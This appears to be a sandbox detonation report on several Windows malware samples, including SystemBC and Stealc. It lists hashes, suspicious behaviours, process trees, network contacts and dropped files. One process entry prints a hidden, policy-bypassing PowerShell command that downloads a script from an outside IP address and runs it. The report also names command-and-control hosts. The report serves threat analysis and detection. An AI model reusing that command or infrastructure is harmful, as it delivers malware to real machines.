| MD5 | 166cc2f997cba5fc011820e6b46e8ea7 |
| SHA1 | d6179213afea084f02566ea190202c752286ca1f |
| SHA256 | c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546 |
| SHA512 | 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb |
Analysis: behavioral4
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win10v2004-20250217-en
Max time kernel
140s
Max time network
139s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\chromium.exe | N/A |
Loads dropped DLL
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\chromium.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1172 wrote to memory of 4520 | N/A | C:\Users\Admin\AppData\Local\Temp\215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd.exe | C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\chromium.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd.exe
"C:\Users\Admin\AppData\Local\Temp\215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\chromium.exe
C:\Users\Admin\AppData\Local\Temp\215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\chromium.exe
| MD5 | 0eb68c59eac29b84f81ad6522d396f59 |
| SHA1 | aacfdf3cb1bdd995f63584f31526b11874fc76a5 |
| SHA256 | dfa74d5d729e90be6e72b3c811a1299abbc52a1f6d347f011101fb5f719d059f |
| SHA512 | 81ee88577d9b665d90bc846aa249c9533aaeed2b7259d15981fcc1686723fe11343b682be25cfa3542117c8a805e40343a7315a69e7204829cbf70f22cca25e7 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\python312.dll
| MD5 | 166cc2f997cba5fc011820e6b46e8ea7 |
| SHA1 | d6179213afea084f02566ea190202c752286ca1f |
| SHA256 | c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546 |
| SHA512 | 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\vcruntime140.dll
| MD5 | be8dbe2dc77ebe7f88f910c61aec691a |
| SHA1 | a19f08bb2b1c1de5bb61daf9f2304531321e0e40 |
| SHA256 | 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83 |
| SHA512 | 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655 |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libssl-3.dll
| MD5 | 4ff168aaa6a1d68e7957175c8513f3a2 |
| SHA1 | 782f886709febc8c7cebcec4d92c66c4d5dbcf57 |
| SHA256 | 2e4d35b681a172d3298caf7dc670451be7a8ba27c26446efc67470742497a950 |
| SHA512 | c372b759b8c7817f2cbb78eccc5a42fa80bdd8d549965bd925a97c3eebdce0335fbfec3995430064dead0f4db68ebb0134eb686a0be195630c49f84b468113e3 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\libcrypto-3.dll
| MD5 | 123ad0908c76ccba4789c084f7a6b8d0 |
| SHA1 | 86de58289c8200ed8c1fc51d5f00e38e32c1aad5 |
| SHA256 | 4e5d5d20d6d31e72ab341c81e97b89e514326c4c861b48638243bdf0918cfa43 |
| SHA512 | 80fae0533ba9a2f5fa7806e86f0db8b6aab32620dde33b70a3596938b529f3822856de75bddb1b06721f8556ec139d784bc0bb9c8da0d391df2c20a80d33cb04 |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_hashlib.pyd
| MD5 | a25bc2b21b555293554d7f611eaa75ea |
| SHA1 | a0dfd4fcfae5b94d4471357f60569b0c18b30c17 |
| SHA256 | 43acecdc00dd5f9a19b48ff251106c63c975c732b9a2a7b91714642f76be074d |
| SHA512 | b39767c2757c65500fc4f4289cb3825333d43cb659e3b95af4347bd2a277a7f25d18359cedbdde9a020c7ab57b736548c739909867ce9de1dbd3f638f4737dc5 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\zstandard\backend_c.pyd
| MD5 | 0fc69d380fadbd787403e03a1539a24a |
| SHA1 | 77f067f6d50f1ec97dfed6fae31a9b801632ef17 |
| SHA256 | 641e0b0fa75764812fff544c174f7c4838b57f6272eaae246eb7c483a0a35afc |
| SHA512 | e63e200baf817717bdcde53ad664296a448123ffd055d477050b8c7efcab8e4403d525ea3c8181a609c00313f7b390edbb754f0a9278232ade7cfb685270aaf0 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\vcruntime140_1.dll
| MD5 | f8dfa78045620cf8a732e67d1b1eb53d |
| SHA1 | ff9a604d8c99405bfdbbf4295825d3fcbc792704 |
| SHA256 | a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5 |
| SHA512 | ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\_wmi.pyd
| MD5 | 827615eee937880862e2f26548b91e83 |
| SHA1 | 186346b816a9de1ba69e51042faf36f47d768b6c |
| SHA256 | 73b7ee3156ef63d6eb7df9900ef3d200a276df61a70d08bd96f5906c39a3ac32 |
| SHA512 | 45114caf2b4a7678e6b1e64d84b118fb3437232b4c0add345ddb6fbda87cebd7b5adad11899bdcd95ddfe83fdc3944a93674ca3d1b5f643a2963fbe709e44fb8 |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_bz2.pyd
| MD5 | 30f396f8411274f15ac85b14b7b3cd3d |
| SHA1 | d3921f39e193d89aa93c2677cbfb47bc1ede949c |
| SHA256 | cb15d6cc7268d3a0bd17d9d9cec330a7c1768b1c911553045c73bc6920de987f |
| SHA512 | 7d997ef18e2cbc5bca20a4730129f69a6d19abdda0261b06ad28ad8a2bddcdecb12e126df9969539216f4f51467c0fe954e4776d842e7b373fe93a8246a5ca3f |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_lzma.pyd
| MD5 | 9e94fac072a14ca9ed3f20292169e5b2 |
| SHA1 | 1eeac19715ea32a65641d82a380b9fa624e3cf0d |
| SHA256 | a46189c5bd0302029847fed934f481835cb8d06470ea3d6b97ada7d325218a9f |
| SHA512 | b7b3d0f737dd3b88794f75a8a6614c6fb6b1a64398c6330a52a2680caf7e558038470f6f3fc024ce691f6f51a852c05f7f431ac2687f4525683ff09132a0decb |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\charset_normalizer\md.pyd
| MD5 | 71d96f1dbfcd6f767d81f8254e572751 |
| SHA1 | e70b74430500ed5117547e0cd339d6e6f4613503 |
| SHA256 | 611e1b4b9ed6788640f550771744d83e404432830bb8e3063f0b8ec3b98911af |
| SHA512 | 7b10e13b3723db0e826b7c7a52090de999626d5fa6c8f9b4630fdeef515a58c40660fa90589532a6d4377f003b3cb5b9851e276a0b3c83b9709e28e6a66a1d32 |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\charset_normalizer\md__mypyc.pyd
| MD5 | d8f690eae02332a6898e9c8b983c56dd |
| SHA1 | 112c1fe25e0d948f767e02f291801c0e4ae592f0 |
| SHA256 | c6bb8cad80b8d7847c52931f11d73ba64f78615218398b2c058f9b218ff21ca9 |
| SHA512 | e732f79f39ba9721cc59dbe8c4785ffd74df84ca00d13d72afa3f96b97b8c7adf4ea9344d79ee2a1c77d58ef28d3ddcc855f3cb13edda928c17b1158abcc5b4a |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\unicodedata.pyd
| MD5 | a8ed52a66731e78b89d3c6c6889c485d |
| SHA1 | 781e5275695ace4a5c3ad4f2874b5e375b521638 |
| SHA256 | bf669344d1b1c607d10304be47d2a2fb572e043109181e2c5c1038485af0c3d7 |
| SHA512 | 1c131911f120a4287ebf596c52de047309e3be6d99bc18555bd309a27e057cc895a018376aa134df1dc13569f47c97c1a6e8872acedfa06930bbf2b175af9017 |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\certifi\cacert.pem
| MD5 | 50ea156b773e8803f6c1fe712f746cba |
| SHA1 | 2c68212e96605210eddf740291862bdf59398aef |
| SHA256 | 94edeb66e91774fcae93a05650914e29096259a5c7e871a1f65d461ab5201b47 |
| SHA512 | 01ed2e7177a99e6cb3fbef815321b6fa036ad14a3f93499f2cb5b0dae5b713fd2e6955aa05f6bda11d80e9e0275040005e5b7d616959b28efc62abb43a3238f0 |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\win32api.pyd
| MD5 | e9d8ab0e7867f5e0d40bd474a5ca288c |
| SHA1 | e7bdf1664099c069ceea18c2922a8db049b4399a |
| SHA256 | df724f6abd66a0549415abaa3fdf490680e6e0ce07584e964b8bfd01e187b487 |
| SHA512 | 49b17e11d02ae99583f835b8ecf526cf1cf9ceab5d8fac0fbfaf45411ac43f0594f93780ae7f6cb3ebbc169a91e81dd57a37c48a8cd5e2653962ffbdcf9879bb |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\Crypto\Cipher\_raw_ecb.pyd
| MD5 | 80bb1e0e06acaf03a0b1d4ef30d14be7 |
| SHA1 | b20cac0d2f3cd803d98a2e8a25fbf65884b0b619 |
| SHA256 | 5d1c2c60c4e571b88f27d4ae7d22494bed57d5ec91939e5716afa3ea7f6871f6 |
| SHA512 | 2a13ab6715b818ad62267ab51e55cd54714aebf21ec9ea61c2aefd56017dc84a6b360d024f8682a2e105582b9c5fe892ecebd2bef8a492279b19ffd84bc83fa5 |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\Crypto\Util\_strxor.pyd
| MD5 | f24f9356a6bdd29b9ef67509a8bc3a96 |
| SHA1 | a26946e938304b4e993872c6721eb8cc1dcbe43b |
| SHA256 | 034bb8efe3068763d32c404c178bd88099192c707a36f5351f7fdb63249c7f81 |
| SHA512 | c4d3f92d7558be1a714388c72f5992165dd7a9e1b4fa83b882536030542d93fdad9148c981f76fff7868192b301ac9256edb8c3d5ce5a1a2acac183f96c1028b |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\Crypto\Hash\_SHA256.pyd
| MD5 | cde035b8ab3d046b1ce37eee7ee91fa0 |
| SHA1 | 4298b62ed67c8d4f731d1b33e68d7dc9a58487ff |
| SHA256 | 16bea322d994a553b293a724b57293d57da62bc7eaf41f287956b306c13fd972 |
| SHA512 | c44fdee5a210459ce4557351e56b2d357fd4937f8ec8eaceab842fee29761f66c2262fcbaac837f39c859c67fa0e23d13e0f60b3ae59be29eb9d8abab0a572bb |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\Crypto\Hash\_BLAKE2s.pyd
| MD5 | d54feb9a270b212b0ccb1937c660678a |
| SHA1 | 224259e5b684c7ac8d79464e51503d302390c5c9 |
| SHA256 | 032b83f1003a796465255d9b246050a196488bac1260f628913e536314afded4 |
| SHA512 | 29955a6569ca6d039b35bb40c56aeeb75fc765600525d0b469f72c97945970a428951bab4af9cd21b3161d5bba932f853778e2674ca83b14f7aba009fa53566f |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\Crypto\Hash\_SHA1.pyd
| MD5 | 556e6d0e5f8e4da74c2780481105d543 |
| SHA1 | 7a49cdef738e9fe9cd6cd62b0f74ead1a1774a33 |
| SHA256 | 247b0885cf83375211861f37b6dd1376aed5131d621ee0137a60fe7910e40f8b |
| SHA512 | 28fa0ce6bdbcc5e95b80aadc284c12658ef0c2be63421af5627776a55050ee0ea0345e30a15b744fc2b2f5b1b1bbb61e4881f27f6e3e863ebaaeed1073f4cda1 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\Crypto\Cipher\_raw_ctr.pyd
| MD5 | c4c525b081f8a0927091178f5f2ee103 |
| SHA1 | a1f17b5ea430ade174d02ecc0b3cb79dbf619900 |
| SHA256 | 4d86a90b2e20cde099d6122c49a72bae081f60eb2eea0f76e740be6c41da6749 |
| SHA512 | 7c06e3e6261427bc6e654b2b53518c7eaa5f860a47ae8e80dc3f8f0fed91e122cb2d4632188dc44123fb759749b5425f426cd1153a8f84485ef0491002b26555 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\Crypto\Cipher\_raw_ofb.pyd
| MD5 | 19e0abf76b274c12ff624a16713f4999 |
| SHA1 | a4b370f556b925f7126bf87f70263d1705c3a0db |
| SHA256 | d9fda05ae16c5387ab46dc728c6edce6a3d0a9e1abdd7acb8b32fc2a17be6f13 |
| SHA512 | d03033ea5cf37641fbd802ebeb5019caef33c9a78e01519fea88f87e773dca92c80b74ba80429b530694dad0bfa3f043a7104234c7c961e18d48019d90277c8e |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\Crypto\Cipher\_raw_cfb.pyd
| MD5 | 899895c0ed6830c4c9a3328cc7df95b6 |
| SHA1 | c02f14ebda8b631195068266ba20e03210abeabc |
| SHA256 | 18d568c7be3e04f4e6026d12b09b1fa3fae50ff29ac3deaf861f3c181653e691 |
| SHA512 | 0b4c50e40af92bc9589668e13df417244274f46f5a66e1fc7d1d59bc281969ba319305becea119385f01cc4603439e4b37afa2cf90645425210848a02839e3e7 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\Crypto\Cipher\_raw_cbc.pyd
| MD5 | 40390f2113dc2a9d6cfae7127f6ba329 |
| SHA1 | 9c886c33a20b3f76b37aa9b10a6954f3c8981772 |
| SHA256 | 6ba9c910f755885e4d356c798a4dd32d2803ea4cfabb3d56165b3017d0491ae2 |
| SHA512 | 617b963816838d649c212c5021d7d0c58839a85d4d33bbaf72c0ec6ecd98b609080e9e57af06fa558ff302660619be57cc974282826ab9f21ae0d80fbaa831a1 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\pywintypes312.dll
| MD5 | da0e290ba30fe8cc1a44eeefcf090820 |
| SHA1 | d38fccd7d6f54aa73bd21f168289d7dce1a9d192 |
| SHA256 | 2d1d60b996d1d5c56c24313d97e0fcda41a8bd6bf0299f6ea4eb4a1e25d490b7 |
| SHA512 | bc031d61e5772c60cbac282d05f76d81af1aa2a29a8602c2efa05fc0ce1079390999336237560b408e6539a77c732f5066c1590b7feaedb24baa9371783f2a8f |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libffi-8.dll
| MD5 | 0f8e4992ca92baaf54cc0b43aaccce21 |
| SHA1 | c7300975df267b1d6adcbac0ac93fd7b1ab49bd2 |
| SHA256 | eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a |
| SHA512 | 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\_ctypes.pyd
| MD5 | 5377ab365c86bbcdd998580a79be28b4 |
| SHA1 | b0a6342df76c4da5b1e28a036025e274be322b35 |
| SHA256 | 6c5f31bef3fdbff31beac0b1a477be880dda61346d859cf34ca93b9291594d93 |
| SHA512 | 56f28d431093b9f08606d09b84a392de7ba390e66b7def469b84a21bfc648b2de3839b2eee4fb846bbf8bb6ba505f9d720ccb6bb1a723e78e8e8b59ab940ac26 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\_queue.pyd
| MD5 | e1c6ff3c48d1ca755fb8a2ba700243b2 |
| SHA1 | 2f2d4c0f429b8a7144d65b179beab2d760396bfb |
| SHA256 | 0a6acfd24dfbaa777460c6d003f71af473d5415607807973a382512f77d075fa |
| SHA512 | 55bfd1a848f2a70a7a55626fb84086689f867a79f09726c825522d8530f4e83708eb7caa7f7869155d3ae48f3b6aa583b556f3971a2f3412626ae76680e83ca1 |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\_ssl.pyd
| MD5 | 90f080c53a2b7e23a5efd5fd3806f352 |
| SHA1 | e3b339533bc906688b4d885bdc29626fbb9df2fe |
| SHA256 | fa5e6fe9545f83704f78316e27446a0026fbebb9c0c3c63faed73a12d89784d4 |
| SHA512 | 4b9b8899052c1e34675985088d39fe7c95bfd1bbce6fd5cbac8b1e61eda2fbb253eef21f8a5362ea624e8b1696f1e46c366835025aabcb7aa66c1e6709aab58a |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\select.pyd
| MD5 | 7c14c7bc02e47d5c8158383cb7e14124 |
| SHA1 | 5ee9e5968e7b5ce9e4c53a303dac9fc8faf98df3 |
| SHA256 | 00bd8bb6dec8c291ec14c8ddfb2209d85f96db02c7a3c39903803384ff3a65e5 |
| SHA512 | af70cbdd882b923013cb47545633b1147ce45c547b8202d7555043cfa77c1deee8a51a2bc5f93db4e3b9cbf7818f625ca8e3b367bffc534e26d35f475351a77c |
C:\Users\Admin\AppData\Local\Temp\onefile_1172_133856959045264095\_socket.pyd
| MD5 | 69801d1a0809c52db984602ca2653541 |
| SHA1 | 0f6e77086f049a7c12880829de051dcbe3d66764 |
| SHA256 | 67aca001d36f2fce6d88dbf46863f60c0b291395b6777c22b642198f98184ba3 |
| SHA512 | 5fce77dd567c046feb5a13baf55fdd8112798818d852dfecc752dac87680ce0b89edfbfbdab32404cf471b70453a33f33488d3104cd82f4e0b94290e83eae7bb |
Analysis: behavioral7
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win7-20240729-en
Max time kernel
15s
Max time network
16s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe
"C:\Users\Admin\AppData\Local\Temp\7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EBE5.tmp\EBE6.tmp\EBE7.bat C:\Users\Admin\AppData\Local\Temp\7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
Network
Files
C:\Users\Admin\AppData\Local\Temp\EBE5.tmp\EBE6.tmp\EBE7.bat
| MD5 | 3895cb9413357f87a88c047ae0d0bd40 |
| SHA1 | 227404dd0f7d7d3ea9601eecd705effe052a6c91 |
| SHA256 | 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785 |
| SHA512 | a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 123a8dceee35e6d67f2ef09bd6a5a475 |
| SHA1 | d1770deaf44cad6b7324d9412fe89d514672d4a3 |
| SHA256 | 9c578d1a8db2196df672f942e5bd51e74f9cbfc0716a311c971ef83838595765 |
| SHA512 | 1c81ce4e932a73d5adaa053c0938586e3c7291c99a063b7ce6dca2a2754ce2b64fab31b9ba1a8b3e07c18302a3a924d3a5a2d66eb33211a2a4cfd17eef906bd0 |
Analysis: behavioral10
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win10v2004-20250217-en
Max time kernel
79s
Max time network
146s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a6b647b49538fe599002c116ee5cd79c7e2d472cb48b24b1dfcf9a2718088c2a.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\a6b647b49538fe599002c116ee5cd79c7e2d472cb48b24b1dfcf9a2718088c2a.exe
"C:\Users\Admin\AppData\Local\Temp\a6b647b49538fe599002c116ee5cd79c7e2d472cb48b24b1dfcf9a2718088c2a.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win10v2004-20250217-en
Max time kernel
149s
Max time network
142s
Command Line
Signatures
SystemBC
Systembc family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\hxrnhkv\xogrd.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\hxrnhkv\xogrd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\hxrnhkv\xogrd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\hxrnhkv\xogrd.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\ProgramData\hxrnhkv\xogrd.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
| N/A | N/A | C:\ProgramData\hxrnhkv\xogrd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\hxrnhkv\xogrd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
| N/A | N/A | C:\ProgramData\hxrnhkv\xogrd.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe
"C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe"
C:\ProgramData\hxrnhkv\xogrd.exe
C:\ProgramData\hxrnhkv\xogrd.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | towerbingobongoboom.com | udp |
| US | 213.209.150.137:4000 | towerbingobongoboom.com | tcp |
| US | 213.209.150.137:4260 | towerbingobongoboom.com | tcp |
Files
C:\ProgramData\hxrnhkv\xogrd.exe
| MD5 | 1dc908064451d5d79018241cea28bc2f |
| SHA1 | f0d9a7d23603e9dd3974ab15400f5ad3938d657a |
| SHA256 | d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454 |
| SHA512 | 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f |
C:\Windows\Tasks\Test Task17.job
| MD5 | b1f4fa9535c2775dddebf3da01dd02cb |
| SHA1 | 9a709c06ec9b4657fa00cbfd04a5ccecb45ce683 |
| SHA256 | bcd2759ef7b7a76e617c0ba2cf583041cf6c895666a66ed29d1912372b4bf30e |
| SHA512 | df9fa75d43846f02e6cdb5d385d3562d0a58c8f17ec5f5c4b94f1b4938ee0ff1344df450f7fe07ad2da3cab3ec82d061d1f1f842bf50e56bec709f636d56e769 |
Analysis: behavioral6
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win10v2004-20250217-en
Max time kernel
124s
Max time network
145s
Command Line
Signatures
Stealc
Stealc family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1928 set thread context of 4172 | N/A | C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe | C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe
"C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe"
C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe
"C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1928 -ip 1928
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 800
Network
| Country | Destination | Domain | Proto |
| NL | 185.201.252.32:80 | 185.201.252.32 | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
